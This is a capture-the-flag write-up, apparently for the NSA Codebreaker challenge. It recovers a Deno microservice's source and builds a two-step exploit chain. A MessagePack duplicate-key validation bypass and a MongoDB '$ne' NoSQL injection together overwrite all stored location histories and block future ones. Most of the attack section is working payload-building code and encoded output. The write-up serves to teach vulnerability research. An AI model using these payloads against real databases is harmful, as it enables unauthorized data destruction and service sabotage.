Points: 1200

Description

So the DNS server is an encrypted tunnel. The working hypothesis is the firmware modifications leak the GPS location of each JCTV to the APT infrastructure via DNS requests. The GA team has been hard at work reverse engineering the modified firmware and ran an offline simulation to collect the DNS requests.

The server receiving this data is accessible and hosted on a platform Cyber Command can legally target. You remember Faruq graduated from Navy ROTC and is now working at Cyber Command in a Cyber National Mission Team. His team has been authorized to target the server, but they don’t have an exploit that will accomplish the task.

Fortunately, you already have experience finding vulnerabilities and this final Co-op tour is in the NSA Vulnerability Research Center where you work with a team of expert Capabilities Development Specialists. Help NSA find a vulnerability that can be used to lessen the impact of this devastating breach! Don’t let DIRNSA down!

You have TWO outcomes to achieve with your exploit:

  1. All historic GPS coordinates for all JCTVs must be overwritten or removed. After your exploit completes, the APT cannot store the new location of any hacked JCTVs.
  2. The scope and scale of the operation that was uncovered suggests that all hacked JCTVs have been leaking their locations for some time. Luckily, no new JCTVs should be compromised before the upcoming Cyber Command operation.

Cyber Command has created a custom exploit framework for this operation. You can use the prototype “thrower.py” to test your exploit locally.

Submit an exploit program (the input file for the thrower) that can be used immediately by Cyber Command.

Downloads:

  • prototype exploit thrower (thrower.py)

Prompt:

  • exploit program used by thrower.py

Solution

Looking back at coredns from the previous task, we can note that once a message is decrypted, its sent in a POST request to http://localhost:3000/event/insert.

image

This is where the microservice binary comes into play.

Running it doesn’t seem to immediately do anything, but killing it does display some logs.

root@4465386024e2:/challenge# ./microservice
{"t":"2025-01-18T08:07:30.053Z","l":"INFO","m":"Received shutdown signal, closing server..."}
{"t":"2025-01-18T08:07:30.054Z","l":"INFO","m":"Disconnected from MongoDB"}

So, we know that it’s intended to interact with MongoDB. Additionally, the port 3000 is commonly used by JavaScript/TypeScript applications, so we can also keep that in mind going forward.

Running binwalk on the binary shows a lot of data, but most notably, a copyright string mentioning Deno is repeated over and over again.

cobra@arch:~/codebreaker/task7$ binwalk microservice
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
DECIMAL                            HEXADECIMAL                        DESCRIPTION                                                                                                                                                               
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0                                  0x0                                ELF binary, 64-bit shared object, AMD X86-64 for System-V (Unix), little endian                                       
...                                                                                                                     
8329457                            0x7F18F1                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. /// <reference path="../../" 
8480998                            0x8168E6                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8550312                            0x8277A8                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8552082                            0x827E92                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8765500                            0x85C03C                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8785101                            0x860CCD                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8801544                            0x864D08                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. /// <reference path="../../" 
8828650                            0x86B6EA                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. import { primordials } from" 
8855578                            0x87201A                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
...

Deno is a JavaScript runtime that was created by creator of Node. Given the large number of copyright strings in the binary’s data it is most likely a compiled Deno web application.

Although there aren’t any automatic decompilation tools, this Reddit thread provides a general direction.

AFAIK Deno simply concats the JS bundle at the end of the Deno exe file which it extracts at runtime.

So, we can just iterate through all the sections with the string “Deno” in them and output them to files that we can dig through to try and find the source code.

We can use a Python script to automate this process.

import subprocess

input_file = 'microservice'
output_dir = './extracted/'
file_size = 95253887

def run_binwalk(input_file):
    result = subprocess.check_output(['binwalk', input_file], text=True)
    return result

def parse_binwalk_output(binwalk_output):
    sections = []
    lines = binwalk_output.split('\n')[5:-4]
    lines = [[y.strip() for y in x.split('                          ')] for x in lines]
    
    for line in lines:
        start_offset = int(line[0])
        description = line[2]
        sections.append((start_offset, description))
    
    return sections

def extract_sections(input_file, sections):
    for i, (start_offset, description) in enumerate(sections):
        output_file = f"{output_dir}section{i + 1}"
        
        if "Deno" in description:
            if i == len(sections) - 1:
                size = file_size - start_offset
            else:
                size = sections[i + 1][0] - start_offset

            dd_command = [
                'dd', 
                f'if={input_file}', 
                f'of={output_file}', 
                'bs=1', 
                f'skip={start_offset}', 
                f'count={size}'
            ]
            
            subprocess.run(dd_command, check=True)
            print(f"Extracted section {i + 1}: to {output_file}")

binwalk_output = run_binwalk(input_file)
sections = parse_binwalk_output(binwalk_output)
extract_sections(input_file, sections)
cobra@arch:~/codebreaker/task7$ python extract.py  
2601186+0 records in                                       
2601186+0 records out                           
2601186 bytes (2.6 MB, 2.5 MiB) copied, 7.61418 s, 342 kB/s
Extracted section 7: to ./extracted/section7    
151541+0 records in
151541+0 records out
151541 bytes (152 kB, 148 KiB) copied, 0.452262 s, 335 kB/s
...

Looking at the extracted files, most of them contain JavaScript, but there’s a lot of other data as well. Since we’ve run the binary and know some of the strings it produces, we can search for those to try to locate the source code.

cobra@arch:~/codebreaker/task7$ grep "Received shutdown signal" extracted/*  
grep: extracted/section212: binary file matches

So, we know the source code must be in section212. Parsing through it, we can find the string as well as some source code hidden in a bunch of JSON data at the end of the section.

image

Although the JSON data is incomplete and some of it overlaps into section213, we can copy what we have so far into a file and pass it into jq to start extracting source code.

cobra@arch:~/codebreaker/task7$ cat extracted.json|jq .

We can immediately see see the content of index.ts and the directory structure which we can mirror.

{
  "version": 3,
  "sources": [
    "file:///work/src/index.ts"
  ],
  "sourcesContent": [
    "console.debug = () => {} // stop debug logging for main app\n\nimport http from 'node:http';\n// @deno-types=\"npm:@types/express\"\nimport express from 'npm:express';\n// @deno-types=\"npm:@types/body-parser\"\nimport bodyParser from 
...

This is followed by mongodb.ts and logger.ts. However, looking at the imports in index.ts, we can see that we are missing routes.ts. So, we need to pull some of the JSON from the next session to find its source code.

Doing a quick search, we can find it and add it to our mirrored directory structure.

Each of these files needs to be formatted to fix new lines and some backslashes from escapes.

We now have the source code (including comments) for the microservice application.

Looking through the functions, we can now see what endpoints it’s listening on including the /event/insert endpoint from the coredns binary.

export function registerRoutes(app: Application) {
    app.post("/event/insert", async (req: Request, res: Response) => {
        try {
            const event = validateLocationEvent(req)
            await insertLocationEvent(event);
            res.status(200).send("Event inserted successfully");
        } catch (error) {
            res.status(500).send("Error inserting event: " + error);
        }
    });

    app.post("/event/test", async (req: Request, res: Response) => {
        try {
            const event: LocationEvent = {
                vid: "o-00-000",
                timestamp: (new Date()).getTime(),
                point: {
                    type: "Point",
                    coordinates: [0, 0] // visiting null island
                }
            };
            await insertLocationEvent(event);
            res.status(200).send("Event inserted successfully");
        } catch (error) {
            res.status(500).send("Error inserting event: " + error);
        }
    });
}

In order to get the source code running, we first need to install MongoDB and then install Deno.

Once everything is installed, we can start MongoDB and run the soure code with Deno.

root@4465386024e2:/challenge/work/src# mongod
root@4465386024e2:/challenge/work/src# deno run --allow-net --allow-sys --allow-read --allow-env index.ts

Unfortunately, we get an error when trying to run the Deno application.

error: Unknown export './asserts' for '@std/[email protected]'.

This is just an import an issue because of naming changes. We can fix it by changing the first line of routes.ts to the following.

import { assert } from "jsr:@std/assert"

Now the microservice source code runs successfully and connects to MongoDB.

root@4465386024e2:/challenge/work/src# deno run --allow-net --allow-sys --allow-read --allow-env index.ts
{"t":"2025-01-18T08:58:21.890Z","l":"INFO","m":"Connected to MongoDB"}
{"t":"2025-01-18T08:58:21.935Z","l":"INFO","m":"Server is running on port 3000"}

Looking around the source code at this point, the entire purpose of the microservice is to track location events in the database after receiving them from coredns. We just need to find a flaw in the way its loading these events to remove all past events and stop the application from functioning in the future.

First, lets get a general idea of how it works and how to interact with it.

We already looked at the insert and test endpoints above. We don’t need to worry about test since its not called by coredns. Looking at insert, the incoming location event is first validated and then actually inserted into the the database.

The validation shows us how the incoming requests are expected to be formatted.

export function validateLocationEvent(req: Request): LocationEvent {
  const buffer = req.body

  // fast checks

  assert(buffer[0] == 0x84) // must be object with 4 keys (v, t, d, m)
  assert(buffer[1] == 0xA1 && buffer[2] == 0x76) // first key is 'v'
  assert(buffer[3] == 0xA8 && buffer[4] == 0x6f) // vids are 8 character strings starting with o

  // slower msgpack decode and other validation

  const msg = msgpack.decode(buffer); // throws on bad decode

  let vid: string = msg.v // already checked above
  assert(vid) // fail fast
  let timestamp: number = msg.t // too old/new checked on event insert
  assert(timestamp) // fail fast

  // translate & check coordinates from msg.d (bias-packed degrees) and msg.m (bit-packed milliseconds)
  // convert to D.DDDDDD accuracy at least 0.000017 or approx 2 meters
  let lat_ms = (msg.m >> 16) & 0xFFFF
  let lon_ms = msg.m & 0xFFFF
  let lat_s = lat_ms / 1000
  let lon_s = lon_ms / 1000
  let lat_df = lat_s / 60
  let lon_df = lon_s / 60
  let lat_di = Math.trunc(msg.d / 361)
  let lon_di = (msg.d % 361)
  let lat: number = unbias(lat_di, lat_df, 90)
  let lon: number = unbias(lon_di, lon_df, 180)
  assert(-90 <= lat && lat <= 90) // latitude range check.  range is [-90, 90]
  assert(-180 <= lon && lon <= 180) // longitude range check. range is [-180, 180]
  assert(!(lat == 0 && lon == 0)) // avoid bogus coordinates (null island)

  const event: LocationEvent = {
      vid: vid,
      timestamp: timestamp,
      point: {
          type: "Point",
          coordinates: [lon, lat] // GeoJSON Point expects longitude first
      }
  }

  return event
}

We basically need to supply an object with a vehicle ID, timestamp, and latitude/longitude data. This object needs to be encoded with MessagePack so that the data format can be strictly controlled. Once the data is decontructed from its MessagePack form and verified, it’s passed into a new LocationEvent object which can be inserted into the database with insertLocationEvent.

export async function insertLocationEvent(event: LocationEvent, force: boolean = false) {
    if (!force) { // force bypass for testing
        const currentTime = new Date();

        if (Math.abs(currentTime.getTime() - event.timestamp) > CLOCK_THRESH) {
            throw new Error("Event timestamp is not within range of the current time");
        }
    }

    let doc = { _id: new ObjectId(), ...event }; // force new id to avoid duplicate key error on fast insertions
    await locationEvents.insertOne(doc)
}

We can also see an additional check here to verify that the timestamp is within a certain threshold of the current time.

Following a maintenance interval, the server also regularly aggregates all the location events into a location history collection to group and organize events for the same vehicles.

connectToDatabase(uri, db).then(() => {
    server = app.listen(port, () => {
        logger.info(`Server is running on port ${port}`);
    });
    setInterval(async () => {
        try {
            await aggregateLocationEvents();
            logger.info('Maintenance task completed');
        } catch (err) {
            logger.error('Failed to run maintenance task', err);
        }
    }, maintenanceInterval);
}).catch(async (err) => {
    logger.error('Failed to connect to the database', err);
    await closeDatabaseConnection();
    Deno.exit(1);
});

There’s also lot of other stuff going on with the location event aggregation, but we will revisit it later.

For now, we know enough to properly communicate with the server. We just need to create an object with the format it’s expecting, encode it with MessagePack, and send it in a POST request.

I opted to use Node for this instead of Deno since I have more familiarity with it. I also just set d and m to 0. There’s a lot of math that goes behind these values as the bias-packed degrees and bias-packed milliseconds, but that’s not import to us. Setting them to 0 will give us the coordinates [1, 1].

const msgpack = require('msgpack-lite');

let event = {
  v: "o-00-000",
  t: (new Date()).getTime(),
  d: 0,
  m: 0
}

buffer = msgpack.encode(event)

fetch('http://127.0.0.1:3000/event/insert', {
  method: 'POST',
  body: buffer,
  headers: {
    'Content-Type': 'application/msgpack'
  }
})

Running our script immediately places the event in the location_events collection.

root@229e90ffa6e4:/challenge/send# node send.js
root@229e90ffa6e4:/# mongosh
test> db.location_events.find()
[
  {
    _id: ObjectId('678c428ece7bba36a8738034'),
    vid: 'o-00-000',
    timestamp: 1737245326517,
    point: { type: 'Point', coordinates: [ 1, 1 ] }
  }
]

As the maintenance interval passes and we send multiple events, we can see the events aggregated by vehicle ID in the location_history collection.

test> db.location_history.find()
[
  {
    _id: ObjectId('678c0d62ce7bba36a8738030'),
    vid: 'o-00-000',
    count: 2,
    starttime: 1737231713970,
    endtime: 1737231814027,
    timestamps: [ 1737231713970, 1737231814027 ],
    lineString: { type: 'LineString', coordinates: [ [ 1, 1 ], [ 1, 1 ] ] }
  }
]

Now that we can communciate with the server, we can start looking for vulnerabilties and ways to abuse the code.

The first thing that is noticeable in validateLocationEvent is the fast checks verifying bytes in the MessagePack data.

// fast checks

assert(buffer[0] == 0x84) // must be object with 4 keys (v, t, d, m)
assert(buffer[1] == 0xA1 && buffer[2] == 0x76) // first key is 'v'
assert(buffer[3] == 0xA8 && buffer[4] == 0x6f) // vids are 8 character strings starting with o

// slower msgpack decode and other validation

const msg = msgpack.decode(buffer); // throws on bad decode

There’s a few interesting things here about how the buffer is being parsed, leading to potential vulnerabilities.

First, the only specific key that it explicitly checks for is v, so we can change the names of the other keys as long they don’t cause the further validation to fail.

Second, there are a lot of restrictions on the provided vehicle ID v. However, with some testing, we can quickly find that if MessagePack receives a buffer with two of the same keys, it will pick the data from the second one. This means that we can put normal data in the first v then add a second v to the end with whatever we want.

The immediate flaw with the second potential vulnerability is that we are only allowed to have 4 keys. However, as mentioned with the first issue, we aren’t necessarily required to have t, d, and m as long as we have 4 keys. So, if we can replace one of these with a second v, we can succesfully bypass the filter.

Let’s see if we can leave any of these variables out and still succeed with validation.

Both v and t are actually run through assertions, so they can’t be equal to undefined without making the validation fail.

let vid: string = msg.v // already checked above
assert(vid) // fail fast
let timestamp: number = msg.t // too old/new checked on event insert
assert(timestamp) // fail fast
╭─cobra@arch ~ 
╰─$ node
> assert(undefined)
Uncaught AssertionError [ERR_ASSERTION]: undefined == true
...

Notably however, the type assertions of string and number for these variables are meaningless except at compile time. When the TypeScript code is compiled, all type checking goes away since the code becomes JavaScript. This means we don’t need to worry about ensuring both of these values are the correct type as long as nothing else blocks their types later on.

Continuing on, we can see where m and d are parsed into the the latitude and longitude.

let lat_ms = (msg.m >> 16) & 0xFFFF
let lon_ms = msg.m & 0xFFFF
let lat_s = lat_ms / 1000
let lon_s = lon_ms / 1000
let lat_df = lat_s / 60
let lon_df = lon_s / 60
let lat_di = Math.trunc(msg.d / 361)
let lon_di = (msg.d % 361)
let lat: number = unbias(lat_di, lat_df, 90)
let lon: number = unbias(lon_di, lon_df, 180)
assert(-90 <= lat && lat <= 90) // latitude range check.  range is [-90, 90]
assert(-180 <= lon && lon <= 180) // longitude range check. range is [-180, 180]
assert(!(lat == 0 && lon == 0)) // avoid bogus coordinates (null island)

Because m is passed only into bitwise operations, if m is undefined, both lat_ms and lon_ms actually will become equal to 0. This is because of the way JavaScript performs bitwise operations.

> (undefined >> 16) & 0xFFFF
0
> undefined & 0xFFFF
0

Luckily, setting lat_ms and lon_ms to 0 is valid, allowing the validation to succeed without m being provided. This means we can replace m with an arbitrary v in our buffer which will be parsed instead of the first v.

To do this, we need to construct our buffer semi-manually. If we only use the MessagePack encoder, it will automatically resolve duplicate keys before we send the buffer to the server.

const msgpack = require('msgpack-lite');

let bytes = []
bytes.push(0x84) 
bytes.push(0xA1)
bytes.push("v".charCodeAt(0))
bytes.push(...msgpack.encode("o-00-000"))
bytes.push(0xA1)
bytes.push("t".charCodeAt(0))
bytes.push(...msgpack.encode(new Date().getTime()))
bytes.push(0xA1)
bytes.push("d".charCodeAt(0))
bytes.push(0)
bytes.push(0xA1)
bytes.push("v".charCodeAt(0))
bytes.push(...msgpack.encode("not 8 characters long"))

let buffer = new Uint8Array(bytes)

fetch('http://127.0.0.1:3000/event/insert', {
  method: 'POST',
  body: buffer,
  headers: {
    'Content-Type': 'application/msgpack'
  }
})

Running our script works to succesfully bypass the vehicle ID restrictions.

root@229e90ffa6e4:/challenge/send# node send.js
test> db.location_events.find()
[
  {
    _id: ObjectId('678c4f55ce7bba36a8738036'),
    vid: 'not 8 characters long',
    timestamp: 1737248597433,
    point: { type: 'Point', coordinates: [ 1, 1 ] }
  }
]

As mentioned previously, the type assertions for vid and timestamp are meaningless because the TypeScript is compiled. This not only means can we make vid more than 8 characters long, but we can also set it to any type we want. However, doing this with the timestamp variable presents an additional obstacle. Each timestamp is checked to make sure that it is close to the current time.

const currentTime = new Date();  

if (Math.abs(currentTime.getTime() - event.timestamp) > CLOCK_THRESH) {
    throw new Error("Event timestamp is not within range of the current time");
}

However, this actually is not an issue for us because of the way JavaScript types compare and evaluate.

If we subtract a non-number from a number, we get NaN. The absolute value of NaN is once again NaN and in any comparison between two values where one is NaN, the comparison will return false, so the error will not be thrown.

> Math.abs(1234 - "asdf") > 0
false

So, we can effectively set timestamp and vid to almost whatever we want. We just need to figure out how we can abuse this. Given we’re interacting with MongoDB, let’s look for NoSQL injection.

There’s a lot of interesting things going on in aggregateLocationEvents which is responsible for grouping events with the same vehicle ID together.

export async function aggregateLocationEvents() {
    const pipeline: any[] = [
        {
            $sort: { vid: 1, timestamp: 1 } // so groups have entries ordered by time (optimized with index)
        },
        {
            $group: {
                _id: "$vid", // group on vid (orderd by timestamp above)
                last_id: { $max: "$_id" }, // track latest entered event to avoid race condition and delete only the aggregated events
                starttime: { $min: "$timestamp" },
                endtime: { $max: "$timestamp" },
                timestamps: { $push: "$timestamp" },
                coords: { $push: "$point.coordinates" }
            }
        },
        {
            $project: {
                location_history: {
                _id: "$last_id",
                vid: "$_id",
                count: { $size: "$timestamps" },
                starttime: "$starttime",
                endtime: "$endtime",
                timestamps: "$timestamps",
                lineString: {
                    type: "LineString",
                    coordinates: "$coords"
                }
                }
            }
        }
    ];

    interface LocationResult {
        location_history: WithId<LocationHistory>;
    }

    const aggregatedResults: Array<LocationResult> = await locationEvents.aggregate(pipeline).toArray() as Array<LocationResult>;

    if (aggregatedResults.length == 0) return;

    const MAX_COUNT = 100; // max events in a single LocationHistory to avoid Mongo errors

    var bulk = locationHistory.initializeUnorderedBulkOp();
    var last_id = new ObjectId(0);

    for (var result of aggregatedResults) {
        let h = result.location_history;
        if (h._id > last_id) last_id = h._id; // keep the last id across all groups

        let last_history_selector: Filter<LocationHistory>  = { vid: h.vid };
        let last_history = (await locationHistory.find(last_history_selector).sort({ endtime: -1 }).limit(1).toArray()).shift();

        if (last_history == null) { // must be a new vid
            let histories = paginate(h, MAX_COUNT, 0);
            for (var newh of histories) {
                await bulk.insert(newh);
            }
        } else { // existing vid
            last_history_selector.endtime = last_history.endtime; // now we can select the correct history to extend

            if ( h.starttime >= last_history.endtime ) { // typical case
                let histories = paginate(h, MAX_COUNT, last_history.count);
                let extra = histories.shift()!;

                // update last history up to the MAX_COUNT locations
                last_history.count += extra.count;
                last_history.endtime = extra.endtime;
                last_history.timestamps.push(...extra.timestamps);
                last_history.lineString.coordinates.push(...extra.lineString.coordinates);

                await bulk.find(last_history_selector).update({ $set: {
                    count: last_history.count,
                    endtime: last_history.endtime,
                    timestamps: last_history.timestamps,
                    lineString: last_history.lineString
                }});

                // add complete additional history entries over MAX_COUNT
                for (var newh of histories) {
                    await bulk.insert(h);
                }

            } else { // unlikely but maybe possible out of order case:  h.starttime < last_history.endtime
            // just drop it since we already have a newer location, maybe implement later
            //throw new Error("todo");
            }
        }
    }

    try { 
        await bulk.execute();
    } catch (e) { // catch for the empty batch edge case
        if (e instanceof MongoInvalidArgumentError) {
            // MongoInvalidArgumentError: Invalid BulkOperation, Batch cannot be empty
            logger.debug("handled exception in aggregateLocationEvents", e);
        } else {
            logger.error("unhandled exception in aggregateLocationEvents", e);
        }
    }

    // clear the locationEvents collection after aggregation up to and including the last_id
    await locationEvents.deleteMany({ _id: { $lte: last_id } });
}

This line is vulnerable to NoSQL injection.

let last_history_selector: Filter<LocationHistory>  = { vid: h.vid };

If we set the h.vid to an object containing additional query syntax, we can control what the query returns. For example, we can set h.vid to {"$ne": ""} which will cause last_history_selector to select every vehicle ID that isn’t empty which should be all of them.

There is also a second place were NoSQL injection is possible. When last_history is not equal to null the last_history_selector endtime is updated to match the endtime of the last history. So, if the last history’s endtime was equal to {"$ne": ""}, the selector would be updated to match every endtime that isn’t empty which is, once again, all the endtimes.

last_history_selector.endtime = last_history.endtime; // now we can select the correct history to extend

Combining these injections, we can devise a series of steps to not only remove past history, but also prevent future history from being aggregated.

First, we send a payload with a timestamp of {"$ne": ""} and a unique vehicle ID like “asdf” which won’t be in the database since it’s invalid. We then wait for it to aggregate into the location_history collection.

Since there’s no previous history for this vehicle ID, last_history will be null, and the event will be inserted into the history collection fresh, but with a malicious timestamp. Since there’s only one timestamp, starttime and endtime are also set to the value of the malicious timestamp.

Second, we send a payload with a timestamp of {"$ne": ""} and a vehicle ID of {"$ne": ""}. Again, we wait for it to aggregate into the location_history collection. Because the vehicle ID abuses the NoSQL injection, last_history_selector will match every vehicle. However, the line below this will pick the event from this set with the latest endtime.

let last_history = (await locationHistory.find(last_history_selector).sort({ endtime: -1 }).limit(1).toArray()).shift();

This actually isn’t an issue for us. When MongoDB compares BSON objects with different types, it uses this hierarchy which guarantees that objects will always be greater than numbers. Since the history document that we created in the first step will have an object endtime, it will be greater than all the other endtimes and last_history will be assigned to it.

Because last_history isn’t null, the last_history_selector endtime will be set to the endtime of last_history which contains our NoSQL injection from the first part. We will then enter into the “typical case” since our history event’s starttime is equal to the last history event’s endtime.

if ( h.starttime >= last_history.endtime ) { // typical case

In this case, the code will update the history chosen by last_history_selector. However, because of our NoSQL injection, this will not match the last history as expected, but will match every history document in the collection. It will then try to update it with the data from last_history which is set to our second payload, meaning the data in our payload will overwrite every single history document in the collection.

await bulk.find(last_history_selector).update({ $set: {
    count: last_history.count,
    endtime: last_history.endtime,
    timestamps: last_history.timestamps,
    lineString: last_history.lineString
}});

Our payloads have now achieved outcome number 1.

For outcome number 2, we need to prevent any new history from being aggregated. Our payloads actually achieve this as well.

After the APT sends new events, these events will eventually be aggregated into histories. However, since we wrote over all the previous histories with the data from our payload, the NoSQL injection will be in every document in the location_history collection. This includes every vid, meaning that when the the new events’ last_history_selectors are created, they will match every history. Each of these histories has an endtime with our NoSQL injection, making all the endtimes objects. Because the new events will be valid and have normal starttimes, the “typical case” will fail since numbers cannot be greater than objects in MongoDB BSON comparisons. This puts us into the second case where the aggregation is dropped.

} else { // unlikely but maybe possible out of order case:  h.starttime < last_history.endtime
        // just drop it since we already have a newer location, maybe implement later
        //throw new Error("todo");
}

Resultantly, all future aggregations will fail, and the events will be cleared, never to be seen again.

// clear the locationEvents collection after aggregation up to and including the last_id
await locationEvents.deleteMany({ _id: { $lte: last_id } });

We can update our script from before to perform the exploit locally and make sure it works. Note that the commented out byte push needs to replace the last byte push for the second payload.

const msgpack = require('msgpack-lite');

let bytes = []
bytes.push(0x84) 
bytes.push(0xA1)
bytes.push("v".charCodeAt(0))
bytes.push(...msgpack.encode("o-00-000"))
bytes.push(0xA1)
bytes.push("t".charCodeAt(0))
bytes.push(...msgpack.encode({"$ne": ""}))
bytes.push(0xA1)
bytes.push("d".charCodeAt(0))
bytes.push(0)
bytes.push(0xA1)
bytes.push("v".charCodeAt(0))
bytes.push(...msgpack.encode("asdf"))
// bytes.push(...msgpack.encode({"$ne": ""}))

let buffer = new Uint8Array(bytes)

fetch('http://127.0.0.1:3000/event/insert', {
  method: 'POST',
  body: buffer,
  headers: {
    'Content-Type': 'application/msgpack'
  }
})

After confirming the steps work locally, we can output the payload data for use with thrower.py.

const msgpack = require('msgpack-lite')

let bytes1 = []
bytes1.push(0x84) 
bytes1.push(0xA1)
bytes1.push('v'.charCodeAt(0))
bytes1.push(...msgpack.encode('o-00-000'))
bytes1.push(0xA1)
bytes1.push('t'.charCodeAt(0))
bytes1.push(...msgpack.encode({'$ne': ''}))
bytes1.push(0xA1)
bytes1.push('d'.charCodeAt(0))
bytes1.push(0)
bytes1.push(0xA1)
bytes1.push('v'.charCodeAt(0))
bytes1.push(...msgpack.encode('asdf'))

let buffer1 = Buffer.from(bytes1)
console.log('Buffer 1:', buffer1.toString('hex'))

let bytes2 = []
bytes2.push(0x84) 
bytes2.push(0xA1)
bytes2.push('v'.charCodeAt(0))
bytes2.push(...msgpack.encode('o-00-000'))
bytes2.push(0xA1)
bytes2.push('t'.charCodeAt(0))
bytes2.push(...msgpack.encode({'$ne': ''}))
bytes2.push(0xA1)
bytes2.push('d'.charCodeAt(0))
bytes2.push(0)
bytes2.push(0xA1)
bytes2.push('v'.charCodeAt(0))
bytes2.push(...msgpack.encode({'$ne': ''}))

let buffer2 = Buffer.from(bytes2)
console.log('Buffer 2:', buffer2.toString('hex'))
root@229e90ffa6e4:/challenge/send# node generate.js
Buffer 1: 84a176a86f2d30302d303030a17481a3246e65a0a16400a176a461736466
Buffer 2: 84a176a86f2d30302d303030a17481a3246e65a0a16400a17681a3246e65a0

We need to encrypt each of these payloads and then encode them like we did in Task 6. I updated the scripts from before to simplify this process.

func main() {
	sharedKey, _ := hex.DecodeString("c59a6a561c3b1692b0db545e0088020a52486e0f610604fc5c154ccf267fc59c")
	associatedData, _ := hex.DecodeString("bfca79b7ab03ed8e804af32a52133ed2f12b3380ddda4a6734cdd7227d73101a")

	var input string
	fmt.Print("Enter message hex: ")
	fmt.Scanln(&input)
	message, _ := hex.DecodeString(input)
	encryptedMessage := encrypt([32]byte(sharedKey), uint64(0), associatedData[:], message)

	fmt.Printf("Encrypted message: %x\n", encryptedMessage)
}
public_key = bytes.fromhex('8a7fdede087b2fc93adf90d7fe75a51a10223a406deeef63fdd9a40847535377')

message = public_key + bytes.fromhex(input('Enter hex: '))
b32_message = base64.b32encode(message).decode('utf-8')

if len(b32_message) > 186:
    exit('Message too long!')

enc_message = ''.join([mapping[x] for x in b32_message])

if len(enc_message) < 186:
    diff = 186 - len(enc_message)
    enc_message += 'x' * diff

print(f'x{enc_message[0:62]}.x{enc_message[62:124]}.x{enc_message[124:]}.net-vwit67xv.example.com.')

Combining these scripts with the payloads gives us the domain names we need.

root@229e90ffa6e4:/challenge# go run encrypt.go 
Enter message hex: 84a176a86f2d30302d303030a17481a3246e65a0a16400a176a461736466
Encrypted message: f6a153b5bc2b6b3ca7c1e0396fba5821a32eef644798430fb3b6ad15004700338474e68b47af4ef99bacfc520c8a
root@229e90ffa6e4:/challenge# go run encrypt.go
Enter message hex: 84a176a86f2d30302d303030a17481a3246e65a0a16400a17681a3246e65a0
Encrypted message: f6a153b5bc2b6b3ca7c1e0396fba5821a32eef644798430fb3936f420a44a2295b3550e5fca595530d6d198d379b27
root@229e90ffa6e4:/challenge# python3 encode.py
Enter hex: f6a153b5bc2b6b3ca7c1e0396fba5821a32eef644798430fb3b6ad15004700338474e68b47af4ef99bacfc520c8a
xH9VTTNG8FCNSIEMVI3BVSTD538824EI0DNNEUOVTR6I0GHQJADRVD8AJMMU2MQ.xPSKV0U0EBFN9C238PETTI4F6231UPRDB8L013G0CS4EJJ8MHTF9RSPNB7SA868.xKzzzxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.net-vwit67xv.example.com.
root@229e90ffa6e4:/challenge# python3 encode.py
Enter hex: f6a153b5bc2b6b3ca7c1e0396fba5821a32eef644798430fb3936f420a44a2295b3550e5fca595530d6d198d379b27
xH9VTTNG8FCNSIEMVI3BVSTD538824EI0DNNEUOVTR6I0GHQJADRVD8AJMMU2MQ.xPSKV0U0EBFN9C238PETTI4F6231UPP6RQ2192A4AAR6L8EBV55IL9GQR8PHKRP.xM9Ozxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.net-vwit67xv.example.com.

Now, we have the two domain names for our payload. We’ll want to send the first payload, sleep for 5 minutes to ensure aggregation occurs, then send the second payload. 5 minutes is the default maintenance interval in the code.

After skimming through thrower.py to get a basic idea of the expected syntax, we can use the following program.

resolve "xH9VTTNG8FCNSIEMVI3BVSTD538824EI0DNNEUOVTR6I0GHQJADRVD8AJMMU2MQ.xPSKV0U0EBFN9C238PETTI4F6231UPRDB8L013G0CS4EJJ8MHTF9RSPNB7SA868.xKzzzxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.net-vwit67xv"

sleep 300000

resolve "xH9VTTNG8FCNSIEMVI3BVSTD538824EI0DNNEUOVTR6I0GHQJADRVD8AJMMU2MQ.xPSKV0U0EBFN9C238PETTI4F6231UPP6RQ2192A4AAR6L8EBV55IL9GQR8PHKRP.xM9Ozxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.net-vwit67xv"

Submitting this solves the task and finally completes the entire challenge.

Result

CONGRATULATIONS!

The operations was a success. By corrupting the collected location data and stopping the leak, the adversary now has no idea where our JCTVs are located. Without this information, they are denied critical operational intelligence regarding our military assets.

GA rollbacked back the changes to the firmware and has locked down their network.

DIRNSA briefed the President on your work and how you completely mitigated the impact of the breach.

Great work by the next generation of cybersecurity professionals working at the NSA. Through your dedication, skills, and teamwork; NSA guaranteed the US military’s advantage on the battlefield.